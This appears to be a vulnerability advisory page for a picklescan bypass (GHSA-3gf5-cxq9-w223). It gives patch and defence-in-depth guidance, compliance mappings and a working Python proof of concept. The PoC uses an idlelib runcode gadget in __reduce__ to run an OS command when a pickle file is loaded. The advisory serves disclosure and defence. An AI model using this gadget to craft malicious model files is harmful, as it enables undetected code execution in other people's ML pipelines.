GHSA-3gf5-cxq9-w223: picklescan: scanner bypass enables pickle RCE in ML models

GHSA-3gf5-cxq9-w223 MEDIUM
Published August 26, 2025
CISO Take

If your team uses picklescan to gate ML model loading (PyTorch, etc.), that control is bypassed by this exploit — attackers can embed RCE payloads in pickle files that pass scanning. Patch picklescan to 0.0.30 immediately and audit any models loaded from untrusted sources since the library was deployed. Until patched, do not treat picklescan clearance as sufficient to load models from external or community sources.

Risk Assessment

Practical risk is HIGH despite the MEDIUM advisory severity (no CVSS score has been assigned). This vulnerability defeats a security control specifically implemented to prevent pickle-based RCE — the exact threat it was designed to block. With a public PoC, exploitation is trivial. The blast radius is any pipeline that treats a picklescan pass as authorization to load a model file, which is likely the common deployment pattern. Supply chain attack potential is significant: a single poisoned model on HuggingFace Hub or a similar registry could compromise many downstream environments.

Affected Systems

Package      Ecosystem   Vulnerable Range   Patched
picklescan   pip         < 0.0.30           0.0.30

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

5 steps
  1. PATCH

    Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass).

  2. AUDIT

    Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised.

  3. DEFENSE-IN-DEPTH

    Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources.

  4. DETECT

    Monitor for unexpected child processes spawned during model-load operations (e.g., os.system calls from the Python interpreter).

  5. PREFER SAFE FORMATS

    Where possible, prefer safetensors over pickle-based formats for model distribution.
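Step 3's allowlist idea can extend to the unpickler itself: rather than blocklisting bad globals (the approach this bypass defeats), refuse every global not explicitly permitted. A minimal stdlib sketch; the SAFE_GLOBALS contents are illustrative, not a vetted list:

```python
import io
import pickle

# Illustrative allowlist: only globals named here may be resolved at load
# time. A real deployment would enumerate exactly what its models need.
SAFE_GLOBALS = {
    ("builtins", "list"),
    ("builtins", "dict"),
    ("collections", "OrderedDict"),
}

class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that rejects any global not on an explicit allowlist."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"blocked global during unpickling: {module}.{name}"
        )

def safe_loads(data: bytes):
    """Load a pickle while refusing all non-allowlisted imports."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Allowlisting inverts the failure mode: an unknown gadget such as idlelib.pyshell.ModifiedInterpreter.runcode is rejected by default instead of slipping through a blocklist.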

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, robustness and cybersecurity of high-risk AI systems Art.17 - Quality management system — supply chain obligations
ISO 42001
A.6.1.6 - AI system supply chain risk management A.8.3 - AI system security
NIST AI RMF
GOVERN 6.1 - Policies for AI risk in the supply chain MANAGE 2.2 - Mechanisms to sustain effectiveness of risk treatments
OWASP LLM Top 10
LLM03:2025 - Supply Chain

Frequently Asked Questions

What is GHSA-3gf5-cxq9-w223?

GHSA-3gf5-cxq9-w223 is a scanner-bypass vulnerability in picklescan versions below 0.0.30. A pickle file can invoke idlelib.pyshell.ModifiedInterpreter.runcode, a stdlib callable absent from picklescan's blocklist, so the file passes scanning as clean yet executes arbitrary code when loaded. Teams that use picklescan to gate ML model loading (PyTorch, etc.) should upgrade to 0.0.30, audit models loaded from untrusted sources, and stop treating a picklescan pass as sufficient on its own.

Is GHSA-3gf5-cxq9-w223 actively exploited?

No confirmed active exploitation of GHSA-3gf5-cxq9-w223 has been reported, but organizations should still patch proactively.

How to fix GHSA-3gf5-cxq9-w223?

1. PATCH: Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass).
2. AUDIT: Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised.
3. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources.
4. DETECT: Monitor for unexpected child processes spawned during model-load operations (e.g., os.system calls from the Python interpreter).
5. PREFER SAFE FORMATS: Where possible, prefer safetensors over pickle-based formats for model distribution.

What systems are affected by GHSA-3gf5-cxq9-w223?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, MLOps CI/CD pipelines, agent frameworks loading external tools/models.

What is the CVSS score for GHSA-3gf5-cxq9-w223?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Summary

Using the idlelib.pyshell.ModifiedInterpreter.runcode function, a built-in Python standard library function, to execute code from a remote pickle file.

Details

The attack payload executes in the following steps: first, the attacker crafts the payload by calling the idlelib.pyshell.ModifiedInterpreter.runcode function in the __reduce__ method. Then, when the victim checks the pickle file with the picklescan library, which does not detect any dangerous functions, and calls pickle.load() on the malicious file, remote code execution occurs.

PoC

```python
from idlelib.pyshell import ModifiedInterpreter
from types import SimpleNamespace

class EvilIdlelibPyshellModifiedInterpreterRuncode:
    def __reduce__(self):
        payload = "__import__('os').system('whoami')"
        fake_self = SimpleNamespace(
            locals={},
            tkconsole=SimpleNamespace(
                executing=False,
                beginexecuting=str,
                canceled=False,
                closing=False,
                showtraceback=str,
                endexecuting=str,
                stderr=None,
                text=SimpleNamespace(),
                getvar=str,
            ),
            rpcclt=None,
            debugger=None,
            checklinecache=str,
            active_seq=None,
            showtraceback=str,
            canceled=False,
            closing=False,
        )
        return ModifiedInterpreter.runcode, (fake_self, payload)
```

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by scanning but executes when the file is loaded. Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu

Exploitation Scenario

An adversary uploads a PyTorch model (.pt file) to a public model hub or sends it via a supply chain vector. The file embeds a `__reduce__` method using `idlelib.pyshell.ModifiedInterpreter.runcode` — not in picklescan's blocklist — to execute an OS command. A target organization's automated MLOps pipeline downloads the model, runs picklescan for validation (result: CLEAN), then calls `torch.load()` or `pickle.load()`. On load, the payload executes: reverse shell, credential theft, or lateral movement. Because the compromise happens inside the Python process at model-load time, it inherits all permissions of the ML worker — often a privileged service account with access to training data, secrets, and inference infrastructure.
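The scenario above works because of pickle's reduce protocol: whatever callable `__reduce__` returns is invoked during `pickle.load`/`pickle.loads`, before the caller ever sees the resulting object. A benign demonstration of that load-time execution:

```python
import pickle

class LoadTimePayload:
    """Stand-in for a malicious model artifact: pickle invokes the callable
    returned by __reduce__ at load time, before the caller sees anything."""

    def __reduce__(self):
        # A real attack would return (os.system, ("...",)) or, as in this
        # advisory, an obscure stdlib callable that evades blocklists.
        return (print, ("payload executed during pickle.load",))

blob = pickle.dumps(LoadTimePayload())
result = pickle.loads(blob)  # prints the message; result is print's None
```

Nothing about the bytes looks executable to the caller; the side effect happens inside the interpreter as part of deserialization, which is why it inherits the ML worker's full permissions.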

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities